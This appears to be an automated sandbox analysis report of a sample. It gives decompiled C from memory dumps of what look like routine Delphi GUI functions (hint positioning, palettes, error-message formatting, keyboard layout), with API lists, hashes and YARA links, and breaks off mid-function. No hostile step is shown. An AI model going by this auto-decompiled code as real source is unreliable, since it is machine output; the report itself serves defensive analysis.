Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: d7d543b54601d380fab14b47c42f309e37ee6fefa39e20c44b7827425fc43199
Instruction ID: 5e9bf025c90783b5fcd42b3f224221feb163a706cc1b8e5ba736bbca5cc48e64
Opcode Fuzzy Hash: d7d543b54601d380fab14b47c42f309e37ee6fefa39e20c44b7827425fc43199
Instruction Fuzzy Hash: 7C011EA5810381DBE711BFA5ACC63493AE0AB5130CF414B7FA441BA2F2E77C41148B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0046840C, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0046840C(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t130;
				struct HWND__* _t166;
				intOrPtr _t188;
				char _t194;
				intOrPtr _t218;
				intOrPtr _t222;
				void* _t238;
				intOrPtr* _t250;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr _t278;
				struct tagRECT* _t301;
				intOrPtr* _t305;
				intOrPtr _t306;
				void* _t313;

				_t312 = _t313;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t269 =  *0x45e048; // 0x45e04c
				E00404D74( &_v100, _t269);
				_t250 =  &_v8;
				_push(_t313);
				_push(0x468792);
				_push( *[fs:eax]);
				 *[fs:eax] = _t313 + 0xffffff70;
				 *((char*)( *_t250 + 0x58)) = 0;
				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E0045E420() == 0 || E00465B24(E004455C8( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
					L23:
					_t130 = _v52;
					__eflags = _t130;
					if(_t130 <= 0) {
						E00468150( *_t250);
					} else {
						E00467F58( *_t250, 0, _t130);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E00468188();
					_v84 = E00464E70();
					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
					E004466E4( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
					_t301 =  &_v76;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t305 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
					_t319 = _t305;
					if(_t305 == 0) {
						_t306 =  *((intOrPtr*)( *_t250 + 0x60));
						_t278 =  *0x442c24; // 0x442c70
						_t166 = E004037A4(_t306, _t278);
						__eflags = _t166;
						if(_t166 != 0) {
							__eflags =  *(_t306 + 0x190);
							if( *(_t306 + 0x190) != 0) {
								ClientToScreen( *(_t306 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t305 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E00446888( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00465AEC( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
					E00443DC8(_v148,  &_v140,  &_v144, _t319);
					E00404470( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
					_t188 =  *0x4a0f2c; // 0x4432c8
					_v96 = _t188;
					_v40 = 0;
					_t257 = 0;
					_v33 = E00447F3C( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
						_t257 =  &_v33;
						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
						_t194 = 0;
					} else {
						_t194 = 1;
					}
					_t284 =  *_t250;
					 *((char*)( *_t250 + 0x58)) = _t194;
					if( *((char*)( *_t250 + 0x58)) == 0) {
						goto L23;
					} else {
						_t326 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E004682E8(_v96, _t257, _t284, _t312);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E00403814( *((intOrPtr*)( *_t250 + 0x84)), _t326) != 0) {
							_t238 = E00468348(_v44, _t250, _t301, 0xffc8, _t312) + 5;
							_v116.left = _v116.left - _t238;
							_v116.right = _v116.right - _t238;
						}
						E0044685C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
						_t218 =  *_t250;
						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
						E0044685C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
						_t222 =  *_t250;
						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
						E00446EE4( *((intOrPtr*)( *_t250 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
						E00465C38(_v44);
						_t231 = _v52;
						if(_v52 <= 0) {
							E00467F58( *_t250, 1, _v48);
						} else {
							E00467F58( *_t250, 0, _t231);
						}
						L26:
						_pop(_t270);
						 *[fs:eax] = _t270;
						_push(0x468799);
						E004043FC( &_v148, 2);
						_t272 =  *0x45e048; // 0x45e04c
						return E00404E44( &_v100, _t272);
					}
				}
			}

0x0046840d
0x00468415
0x00468416
0x00468417
0x0046841a
0x00468420
0x0046842b
0x0046842c
0x0046842d
0x00468433
0x00468439
0x0046843e
0x00468443
0x00468444
0x00468449
0x0046844c
0x00468451
0x0046845e
0x0046874b
0x0046874b
0x0046874e
0x00468750
0x00468761
0x00468752
0x00468758
0x00468758
0x00000000
0x00468497
0x0046849c
0x004684a2
0x004684a8
0x004684b0
0x004684bd
0x004684c5
0x004684d0
0x004684d8
0x004684db
0x004684dc
0x004684dd
0x004684de
0x004684e9
0x004684ee
0x004684f3
0x004684fb
0x004684fe
0x00468500
0x00468510
0x00468515
0x0046851b
0x00468520
0x00468522
0x00468524
0x0046852b
0x00468538
0x00468538
0x0046852b
0x00468502
0x00468509
0x00468509
0x0046854f
0x00468562
0x0046856d
0x00468576
0x00468584
0x00468595
0x004685a3
0x004685aa
0x004685b2
0x004685b5
0x004685ba
0x004685bf
0x004685cb
0x004685d9
0x004685e1
0x004685f3
0x00468601
0x00468601
0x0046860b
0x00468615
0x00468619
0x00468619
0x00468619
0x0046861b
0x0046861d
0x00468626
0x00000000
0x0046862c
0x0046862c
0x00468630
0x00000000
0x00000000
0x0046863a
0x00468652
0x0046866d
0x0046867f
0x00468697
0x004686a3
0x004686a6
0x004686a9
0x004686a9
0x004686ba
0x004686bf
0x004686c7
0x004686d0
0x004686e1
0x004686e6
0x004686ee
0x004686f7
0x00468705
0x0046871e
0x00468724
0x00468729
0x0046872e
0x00468744
0x00468730
0x00468736
0x00468736
0x00468766
0x00468768
0x0046876b
0x0046876e
0x0046877e
0x00468786
0x00468791
0x00468791
0x00468626

APIs

Part of subcall function 0045E420: GetActiveWindow.USER32 ref: 0045E423
Part of subcall function 0045E420: GetCurrentThreadId.KERNEL32(0045E400), ref: 0045E438
Part of subcall function 0045E420: EnumThreadWindows.USER32 ref: 0045E43E

Part of subcall function 00468188: GetCursor.USER32 ref: 004681A3
Part of subcall function 00468188: GetIconInfo.USER32 ref: 004681A9

ClientToScreen.USER32(?,?), ref: 00468538
OffsetRect.USER32 ref: 0046854F
OffsetRect.USER32 ref: 0046867F

Part of subcall function 00467F58: SetTimer.USER32(00000000,00000000,?,00465B44), ref: 00467F72

Strings

LE, xrefs: 00468433, 00468786
p,D, xrefs: 00468515

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
String ID: LE$p,D
API String ID: 2591747986-1459914165
Opcode ID: 3f514d1b279f4684ea7dcbc786024fd66dd162b6d4eb07ddb02efb51497773fe
Instruction ID: 4df6cd0bd6e22d9b73dfc7cb0f771a4b9e35a04e1be34146c9ff92ad727a439d
Opcode Fuzzy Hash: 3f514d1b279f4684ea7dcbc786024fd66dd162b6d4eb07ddb02efb51497773fe
Instruction Fuzzy Hash: 9EC1F875A006188FCB10DFA8C880E9EB7F5BF09304F5541AAE505EB366EB34AD49CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0042E8CC, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0042E8CC(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				void* _t72;
				void* _t74;
				void* _t75;
				struct HDC__* _t76;
				intOrPtr _t97;
				void* _t107;
				void* _t109;
				void* _t110;
				intOrPtr _t112;

				_t107 = _t109;
				_t110 = _t109 + 0xffffffa0;
				_t72 = __edx;
				_v8 = __eax;
				_t44 = E0042D9A8(_v8);
				if(_t72 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t72 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0x4bae30; // 0x4263a4
							_t44 = E0042979C(_t49);
							goto L16;
						} else {
							E00402FB0( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t112 = _t110 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *0x004A08BF & 0x000000ff;
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t74 = _t72 - 2;
							if(_t74 == 0) {
								_t56 =  *0x4bc890; // 0xe4080bba
								_v12 = _t56;
							} else {
								_t75 = _t74 - 1;
								if(_t75 == 0) {
									_t76 = E004298D4(GetDC(0));
									_v12 = CreateHalftonePalette(_t76);
									_v13 = 1;
									ReleaseDC(0, _t76);
								} else {
									if(_t75 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t112;
							 *((char*)(_v8 + 0x22)) = E0042D488( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42ea19, _t107),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t97);
							 *[fs:eax] = _t97;
							_push(0x42ea20);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

0x0042e8cd
0x0042e8cf
0x0042e8d5
0x0042e8d7
0x0042e8dd
0x0042e8e4
0x0042ea2b
0x0042ea31
0x0042e8ea
0x0042e8ec
0x0042e8ee
0x0042e8fd
0x00000000
0x0042e8f0
0x0042e8f2
0x0042e905
0x0042e90a
0x00000000
0x0042e8f4
0x0042e91e
0x0042e934
0x0042e934
0x0042e936
0x0042e93c
0x0042e93f
0x0042e949
0x0042e94f
0x0042e952
0x0042e963
0x0042e96a
0x0042e96d
0x0042e970
0x0042e97d
0x0042e982
0x0042e972
0x0042e972
0x0042e974
0x0042e993
0x0042e99b
0x0042e99e
0x0042e9a5
0x0042e976
0x0042e979
0x0042e9ac
0x0042e9b3
0x0042e9ba
0x0042e9c1
0x0042e9c1
0x0042e979
0x0042e974
0x0042e9d3
0x0042e9f9
0x0042e9fe
0x0042ea01
0x0042ea04
0x0042ea0d
0x00000000
0x0042ea13
0x0042ea18
0x0042ea18
0x0042e8f2
0x0042e8ee

APIs

GetDC.USER32(00000000), ref: 0042E989
CreateHalftonePalette.GDI32(00000000), ref: 0042E996
ReleaseDC.USER32(00000000,00000000), ref: 0042E9A5
DeleteObject.GDI32(00000000), ref: 0042EA13

Strings

(, xrefs: 0042E93F

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteHalftoneObjectPaletteRelease
String ID: (
API String ID: 577518360-3887548279
Opcode ID: a04fe8107923636f8f5f6b37d4746c9cd68659e9474c3a57b10d712689bffbcd
Instruction ID: f5e3a01e5c639e4baebaadd96e3c1e631a1deada1dbef49bdc2e10035d049f97
Opcode Fuzzy Hash: a04fe8107923636f8f5f6b37d4746c9cd68659e9474c3a57b10d712689bffbcd
Instruction Fuzzy Hash: C541C470B04218DFDB10DFA6E445B9EB7F2EF4A304F9040ABE404AB391D6786E45DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C840, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C840(intOrPtr* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v277;
				char _v538;
				char _v794;
				struct _MEMORY_BASIC_INFORMATION _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char* _v856;
				char _v860;
				char _v864;
				char _v1120;
				void* __edi;
				struct HINSTANCE__* _t45;
				intOrPtr _t58;
				struct HINSTANCE__* _t60;
				void* _t78;
				intOrPtr* _t83;
				void* _t94;
				void* _t95;
				void* _t102;

				_t102 = __fp0;
				_t84 = __ecx;
				_t94 = __ecx;
				_t95 = __edx;
				_t83 = __eax;
				VirtualQuery(__edx,  &_v824, 0x1c);
				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
					_t45 =  *0x4bc668; // 0x400000
					GetModuleFileNameA(_t45,  &_v538, 0x105);
					_v16 = E0040C834(_t95);
				} else {
					_v16 = _t95 - _v824.AllocationBase;
				}
				E004094D0( &_v277, 0x104, E0040D990( &_v538, _t84, 0x5c) + 1);
				_v8 = 0x40c9d0;
				_v12 = 0x40c9d0;
				_t91 =  *0x407b7c; // 0x407bc8
				if(E004037A4(_t83, _t91) != 0) {
					_v8 = E00404898( *((intOrPtr*)(_t83 + 4)));
					_t78 = E0040946C(_v8, _t94);
					if(_t78 != 0) {
						_t91 = _v8;
						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
							_v12 = 0x40c9d4;
						}
					}
				}
				_t58 =  *0x4bb20c; // 0x4078e4
				_t21 = _t58 + 4; // 0xffd0
				_t60 =  *0x4bc668; // 0x400000
				LoadStringA(E00405A30(_t60, 0x104, _t91),  *_t21,  &_v794, 0x100);
				E0040355C( *_t83,  &_v1120);
				_v864 =  &_v1120;
				_v860 = 4;
				_v856 =  &_v277;
				_v852 = 6;
				_v848 = _v16;
				_v844 = 5;
				_v840 = _v8;
				_v836 = 6;
				_v832 = _v12;
				_v828 = 6;
				E00409B40(_t94, _a4, _t102, 4,  &_v864);
				return E0040946C(_t94, _t94);
			}

0x0040c840
0x0040c840
0x0040c84c
0x0040c84e
0x0040c850
0x0040c85c
0x0040c86b
0x0040c895
0x0040c89b
0x0040c8a7
0x0040c8ac
0x0040c8b2
0x0040c8b2
0x0040c8d0
0x0040c8da
0x0040c8e2
0x0040c8e7
0x0040c8f4
0x0040c8fe
0x0040c904
0x0040c90b
0x0040c90d
0x0040c915
0x0040c91c
0x0040c91c
0x0040c915
0x0040c90b
0x0040c92b
0x0040c930
0x0040c934
0x0040c93f
0x0040c94c
0x0040c957
0x0040c95d
0x0040c96a
0x0040c970
0x0040c97a
0x0040c980
0x0040c98a
0x0040c990
0x0040c99a
0x0040c9a0
0x0040c9bb
0x0040c9cd

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C85C
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C880
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C89B
LoadStringA.USER32 ref: 0040C93F

Strings

x@, xrefs: 0040C92B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: x@
API String ID: 3990497365-1963665138
Opcode ID: ab4b15ff4bbae09c13e02e085f4b46d76bc37b2070cb6e6f5ff62ae920f064c7
Instruction ID: eefebdac6144b534ac7d4185644087d7df9ced5bc74a4d82f61a036f97308ad6
Opcode Fuzzy Hash: ab4b15ff4bbae09c13e02e085f4b46d76bc37b2070cb6e6f5ff62ae920f064c7
Instruction Fuzzy Hash: B441FDB19002589FDB11EB69CC85BDAB7B9AB08304F0441F6A948F7291D7789F44CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040C83E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C83E(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v277;
				char _v538;
				char _v794;
				struct _MEMORY_BASIC_INFORMATION _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char* _v856;
				char _v860;
				char _v864;
				char _v1120;
				void* __edi;
				struct HINSTANCE__* _t45;
				intOrPtr _t58;
				struct HINSTANCE__* _t60;
				void* _t78;
				intOrPtr* _t84;
				void* _t97;
				void* _t100;
				void* _t114;

				_t86 = __ecx;
				_t97 = __ecx;
				_t100 = __edx;
				_t84 = __eax;
				VirtualQuery(__edx,  &_v824, 0x1c);
				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
					_t45 =  *0x4bc668; // 0x400000
					GetModuleFileNameA(_t45,  &_v538, 0x105);
					_v16 = E0040C834(_t100);
				} else {
					_v16 = _t100 - _v824.AllocationBase;
				}
				E004094D0( &_v277, 0x104, E0040D990( &_v538, _t86, 0x5c) + 1);
				_v8 = 0x40c9d0;
				_v12 = 0x40c9d0;
				_t93 =  *0x407b7c; // 0x407bc8
				if(E004037A4(_t84, _t93) != 0) {
					_v8 = E00404898( *((intOrPtr*)(_t84 + 4)));
					_t78 = E0040946C(_v8, _t97);
					if(_t78 != 0) {
						_t93 = _v8;
						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
							_v12 = 0x40c9d4;
						}
					}
				}
				_t58 =  *0x4bb20c; // 0x4078e4
				_t21 = _t58 + 4; // 0xffd0
				_t60 =  *0x4bc668; // 0x400000
				LoadStringA(E00405A30(_t60, 0x104, _t93),  *_t21,  &_v794, 0x100);
				E0040355C( *_t84,  &_v1120);
				_v864 =  &_v1120;
				_v860 = 4;
				_v856 =  &_v277;
				_v852 = 6;
				_v848 = _v16;
				_v844 = 5;
				_v840 = _v8;
				_v836 = 6;
				_v832 = _v12;
				_v828 = 6;
				E00409B40(_t97, _a4, _t114, 4,  &_v864);
				return E0040946C(_t97, _t97);
			}

0x0040c83e
0x0040c84c
0x0040c84e
0x0040c850
0x0040c85c
0x0040c86b
0x0040c895
0x0040c89b
0x0040c8a7
0x0040c8ac
0x0040c8b2
0x0040c8b2
0x0040c8d0
0x0040c8da
0x0040c8e2
0x0040c8e7
0x0040c8f4
0x0040c8fe
0x0040c904
0x0040c90b
0x0040c90d
0x0040c915
0x0040c91c
0x0040c91c
0x0040c915
0x0040c90b
0x0040c92b
0x0040c930
0x0040c934
0x0040c93f
0x0040c94c
0x0040c957
0x0040c95d
0x0040c96a
0x0040c970
0x0040c97a
0x0040c980
0x0040c98a
0x0040c990
0x0040c99a
0x0040c9a0
0x0040c9bb
0x0040c9cd

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C85C
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C880
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C89B
LoadStringA.USER32 ref: 0040C93F

Strings

x@, xrefs: 0040C92B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: x@
API String ID: 3990497365-1963665138
Opcode ID: 16e1ada8cc568decffdfb33953bd20af61900dc27c540830cf1c4295d3441a52
Instruction ID: e54f558ca846f801a4dcb179523658493c1ea09cb64bf8224657a482f743d531
Opcode Fuzzy Hash: 16e1ada8cc568decffdfb33953bd20af61900dc27c540830cf1c4295d3441a52
Instruction Fuzzy Hash: 5C41FEB0A042589FDB11EB69CC85BDAB7F99B08304F0441F6A948F7291D7789F44CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00464C44, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00464C44(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				char _t67;
				void* _t77;
				struct HDC__* _t78;
				void* _t79;
				void* _t80;

				_t77 = __edi;
				_t67 = __edx;
				if(__edx != 0) {
					_t80 = _t80 + 0xfffffff0;
					_t25 = E00403984(_t25, _t79);
				}
				_v5 = _t67;
				_t65 = _t25;
				E00424FB8(_t66, 0);
				_t28 =  *0x4badb8; // 0x4a059c
				 *((intOrPtr*)(_t28 + 4)) = _t65;
				 *_t28 = 0x464fe8;
				_t29 =  *0x4badcc; // 0x4a05a4
				 *((intOrPtr*)(_t29 + 4)) = _t65;
				 *_t29 = 0x464ff4;
				E00465000(_t65);
				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t65 + 0x4c)) = E004035DC(1);
				 *((intOrPtr*)(_t65 + 0x50)) = E004035DC(1);
				 *((intOrPtr*)(_t65 + 0x54)) = E004035DC(1);
				 *((intOrPtr*)(_t65 + 0x58)) = E004035DC(1);
				 *((intOrPtr*)(_t65 + 0x7c)) = E004035DC(1);
				_t78 = GetDC(0);
				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
				ReleaseDC(0, _t78);
				_t11 = _t65 + 0x58; // 0x45dfdc6e
				_t48 =  *0x4baf90; // 0x4bc920
				 *((intOrPtr*)( *_t48))(0, 0, E00461418,  *_t11);
				 *((intOrPtr*)(_t65 + 0x84)) = E004282BC(1);
				 *((intOrPtr*)(_t65 + 0x88)) = E004282BC(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E004282BC(1);
				E00465498(_t65, _t65, _t66, _t77);
				_t15 = _t65 + 0x84; // 0x38004010
				_t59 =  *_t15;
				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
				 *((intOrPtr*)(_t59 + 8)) = 0x465360;
				_t18 = _t65 + 0x88; // 0x90000000
				_t60 =  *_t18;
				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
				 *((intOrPtr*)(_t60 + 8)) = 0x465360;
				_t21 = _t65 + 0x80; // 0xe8000000
				_t61 =  *_t21;
				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
				 *((intOrPtr*)(_t61 + 8)) = 0x465360;
				_t62 = _t65;
				if(_v5 != 0) {
					E004039DC(_t62);
					_pop( *[fs:0x0]);
				}
				return _t65;
			}

0x00464c44
0x00464c44
0x00464c4c
0x00464c4e
0x00464c51
0x00464c51
0x00464c56
0x00464c59
0x00464c5f
0x00464c64
0x00464c69
0x00464c6c
0x00464c72
0x00464c77
0x00464c7a
0x00464c82
0x00464c8e
0x00464c9d
0x00464cac
0x00464cbb
0x00464cca
0x00464cd9
0x00464ce3
0x00464ced
0x00464cf3
0x00464cf8
0x00464d06
0x00464d0d
0x00464d1b
0x00464d2d
0x00464d3f
0x00464d47
0x00464d4c
0x00464d4c
0x00464d52
0x00464d55
0x00464d5c
0x00464d5c
0x00464d62
0x00464d65
0x00464d6c
0x00464d6c
0x00464d72
0x00464d75
0x00464d7c
0x00464d82
0x00464d84
0x00464d89
0x00464d90
0x00464d99

APIs

GetKeyboardLayout.USER32 ref: 00464C89
GetDC.USER32(00000000), ref: 00464CDE
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00464CE8
ReleaseDC.USER32(00000000,00000000), ref: 00464CF3

Strings

pkB, xrefs: 00464D11, 00464D23, 00464D35

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID: pkB
API String ID: 3331096196-3043697554
Opcode ID: d9a37da496382b2c90e0957f60970851febd5645a27e2659bab8a2e3f111b15f
Instruction ID: ca57cebd03d830e7dfbb6e1b30c18f23ade59c1812026a35f6992e7b80faba1a
Opcode Fuzzy Hash: d9a37da496382b2c90e0957f60970851febd5645a27e2659bab8a2e3f111b15f
Instruction Fuzzy Hash: 4731E5706012009FD750EF2ADC82B497BE4BB04319F4590BEE808DF3A6EA79A805CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E27C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E27C() {
				intOrPtr* _v12;
				struct HINSTANCE__** _t8;
				intOrPtr* _t10;
				struct HINSTANCE__** _t17;
				struct HRSRC__* _t19;
				struct HINSTANCE__** _t20;
				struct HINSTANCE__* _t26;
				void* _t27;
				intOrPtr* _t28;

